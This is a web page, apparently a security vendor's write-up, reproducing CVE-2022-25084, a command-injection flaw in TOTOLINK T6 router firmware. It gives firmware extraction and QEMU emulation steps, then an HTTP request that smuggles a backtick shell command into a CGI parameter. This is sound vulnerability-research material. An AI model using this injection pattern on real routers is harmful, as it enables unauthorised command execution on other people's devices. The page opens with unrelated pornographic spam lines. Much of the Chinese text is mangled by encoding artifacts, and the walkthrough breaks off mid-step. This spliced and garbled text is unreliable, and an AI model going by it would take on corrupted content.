国产精品久久久一区二区三区,少妇各种高潮抽搐30分钟,女优一区二区三区

亚洲精品v日韩精品-国产妇女乱码一区二区三区-HD免费看片,大粗又爽又黄少妇毛片免费,亚洲国产精品伦理,韩国三级bd高清中文字幕下载

熱門閱讀

美創(chuàng)科技打造縣域醫(yī)療災(zāi)備新標桿｜神木市醫(yī)院 HIS 系統(tǒng)數(shù)據(jù)庫分鐘級切換演練實錄

2025-07-02

百萬罰單警示！DCAS助力金融機構(gòu)筑牢數(shù)據(jù)安全防線，實現(xiàn)監(jiān)管合規(guī)

2025-06-20

2025中國互聯(lián)網(wǎng)產(chǎn)業(yè)年會丨《中國互聯(lián)網(wǎng)產(chǎn)業(yè)綠色算力發(fā)展倡議》正式發(fā)布

2025-02-07

美創(chuàng)用戶專訪 | 精細化管理：醫(yī)療行業(yè)數(shù)據(jù)分類分級的策略與實踐

2025-01-10

容災(zāi)演練雙月報｜美創(chuàng)助力某特大型通信基礎(chǔ)設(shè)施央企順利完成多個核心系統(tǒng)異地容災(zāi)演練

2025-01-10

相關(guān)文章

每周安全速遞3?? | Aeza集團因托管勒索軟件和信息竊取服務(wù)器而受到制裁

2025-07-04

每周安全速遞3?? | 俄羅斯法院釋放多名REvil勒索軟件團伙成員引發(fā)爭議

2025-06-27

每周安全速遞3?? | 勒索團伙聲稱竊取Freedman HealthCare敏感文件

2025-06-20

每周安全速遞3?? | Play勒索團伙利用SimpleHelp漏洞實施雙重勒索

2025-06-13

每周安全速遞3?? | 維多利亞的秘密因網(wǎng)絡(luò)安全事件推遲2025年一季度財報發(fā)布

2025-06-06

CVE-2022-25084 TOTOLINK路由器任意命令執(zhí)行漏洞復現(xiàn)

發(fā)布時間：2023-06-02 閱讀次數(shù)： 927 次

漏洞簡介

TOTOLINK是一款無線路由品牌，TOTOLINK T6_Firmware V5.9c.4085_B20190428存在一個任意命令執(zhí)行漏洞。

影響版本

TOTOLINK T6_Firmware V5.9c.4085_B20190428

訪問

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.h

下載T6_Firmware V5.9c.4085_B20190428固件

固件下載成功后，執(zhí)行

binwalk -Me TOTOLINK_C818NR_T6_IP04338_8197FN_SPI_16M128M_V5.9c.4085_B20190428_ALL.web --run-as=root

提取文件系統(tǒng)

進入提取的文件系統(tǒng)目錄

執(zhí)行

mkdir var/run && touch /var/run/lighttpd.pid

創(chuàng)建路由器啟動環(huán)境所需的pid

執(zhí)行

給路由器web服務(wù)創(chuàng)建一個虛擬網(wǎng)絡(luò)環(huán)境

執(zhí)行

wget https://people.debian.org/\~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2 && wget https://people.debian.org/\~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta

下載鏡像和虛擬磁盤環(huán)境，為搭建路由器web作前置準備

鏡像和虛擬磁盤下載完畢后，執(zhí)行

qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic

啟動虛擬環(huán)境，虛擬環(huán)境啟動后賬號密碼為root/root

登錄虛擬環(huán)境后，執(zhí)行

ifconfig eth0 192.168.6.10

配置虛擬環(huán)境網(wǎng)絡(luò)

返回原始機器環(huán)境，執(zhí)行

scp -r squashfs-root/ root@192.168.6.10:/root/

將文件系統(tǒng)拷貝至虛擬環(huán)境中

在虛擬環(huán)境中執(zhí)行

啟動路由器web服務(wù)

在原始機器環(huán)境中通過瀏覽器訪問

http://192.168.6.15/login.asp

出現(xiàn)如圖所示頁面代表環(huán)境搭建成功

該漏洞觸發(fā)點位于

/cgi-bin/downloadFlile.cgi

構(gòu)造如下數(shù)據(jù)包并請求

執(zhí)行pwd命令并將命令結(jié)果寫入../pwd.txt

GET /cgi-bin/downloadFlile.cgi?payload=`pwd>../pwd.txt` HTTP/1.1
Host: 192.168.6.10
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

瀏覽器訪問